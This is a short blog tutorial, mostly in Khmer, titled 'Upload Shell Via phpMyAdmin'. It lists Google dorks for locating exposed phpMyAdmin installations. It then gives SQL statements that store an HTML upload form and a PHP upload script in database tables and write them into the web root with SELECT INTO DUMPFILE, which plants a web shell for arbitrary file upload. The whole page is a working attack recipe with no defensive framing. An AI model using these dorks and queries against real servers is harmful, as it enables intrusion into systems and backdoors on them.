This page looks best with JavaScript enabled

Upload Shell Via phpMyAdmin

 ·  β˜• 1 min read  ·  🐱 thik

Google Dorks

  • allinurl:index.php?db=information_schema
  • allinurl:/read_dump.php?

SQL Query

αž…αžΌαž›αž‘αŸ…αž€αžΆαž“αŸ‹αž•αŸ’αž‘αžΆαŸ†αž„ phpMyAdmin Database αž αžΎαž™αž”αž„αŸ’αž€αžΎαž Database αžαŸ’αž˜αžΈαž˜αž½αž™ ឧ, “uploader” αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž…αž»αž…αžαŸ’αžšαž„αŸ‹αž•αŸ’αž‘αžΆαŸ†αž„ SQL αž αžΎαž™αž…αž˜αŸ’αž›αž„αž…αžΌαž›αž“αžΌαžœαž€αžΌαžŠαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž“αŸαŸ‡αŸ–

1
2
3
CREATE TABLE `uploader`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

αž“αž·αž„αž€αžΌαžŠαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž“αŸαŸ‡αž‘αŸ€αžαŸ–

1
2
3
CREATE TABLE `uploader`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž…αžΌαž›αž‘αŸ…αž€αžΆαž“αŸ‹ Table αžˆαŸ’αž˜αŸ„αŸ‡αžαžΆ user_upload αž αžΎαž™αž…αž»αž…αžαŸ’αžšαž„αŸ‹αž•αŸ’αž‘αžΆαŸ†αž„ SQL αž“αž·αž„αž…αž˜αŸ’αž›αž„αž…αžΌαž›αž“αžΌαžœαž€αžΌαžŠαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
insert into userform values ('<!DOCTYPE html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Uploader</title>
</head>
<body bgcolor="black">
<center>
<div style="color:white;margin-top:150px;"><h1>Uploader</h1></div>
<div><br><br>
<form enctype="multipart/form-data" action="uploader.php" method="post">
<input name="userfile" type="file" /><input type="submit" value="Upload" />
</form>
</div>
</center>
</body>
</html>');

αž“αž·αž„αž€αžΌαžŠαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž•αž„αžŠαŸ‚αžš

1
select * into dumpfile 'C:/xampp/htdocs/wkspace/up.php' from userform

αžŠαžΎαž˜αŸ’αž”αžΈαžŸαŸ’αžœαŸ‚αž„αžšαž€αž“αžΌαžœαž‘αžΈαžαžΆαŸ†αž„αžšαž”αžŸαŸ‹ Database Webserver αž™αžΎαž„αž’αžΆαž…αž”αŸ’αžšαžΎ Syntax αž˜αž½αž™αž“αŸαŸ‡ “SELECT @@datadir” αž“αŸ…αž€αŸ’αž“αž»αž„ SQL Query SQL Cheatsheet

αž€αŸ’αžšαŸ„αž™αž˜αž€αž…αž˜αŸ’αž›αž„αž…αžΌαž›αž€αžΌαžŠαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž“αŸ…αž€αŸ’αž“αž»αž„ table user_upload

1
2
3
4
5
6
INSERT INTO user_upload
VALUES (
"<?php $uploaddir = 'C:/xampp/htdocs/wkspace/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if
 
(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=black><center><h2 style=color:white;margin-top:150px;>Uploaded successully.</h2></center></body>'; } else { print '<body bgcolor=black><center><h2 style=color:red;margin-top:150px;>Uploaded Failed.</h2></center></body>'; } ?>"
)

αž‡αžΆαž…αž»αž„αž€αŸ’αžšαŸ„αž™αž…αž˜αŸ’αž›αž„αž…αžΌαž›αž“αžΌαžœαž€αžΌαžŠαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1
select * into dumpfile 'C:/xampp/htdocs/wkspace/uploader.php' from user_upload

αž₯αž‘αžΌαžœαžŸαžΆαž€αž›αŸ’αž”αž„αž”αžΎαž€αž˜αžΎαž› Web Shell αžŠαŸ‚αž›αž”αžΆαž“αž”αž„αŸ’αž αŸ„αŸ‡αžšαž½αž…αž‘αŸ…αžαžΆαž˜αž‘αžΈαžαžΆαŸ†αž„αžŠαŸ‚αž›αž”αžΆαž“αž”αž‰αŸ’αž…αžΌαž› αž‡αžΆαž€αžΆαžšαžŸαŸ’αžšαŸαž…αŸ”

Share on

Thik
WRITTEN BY
thik
Security Researcher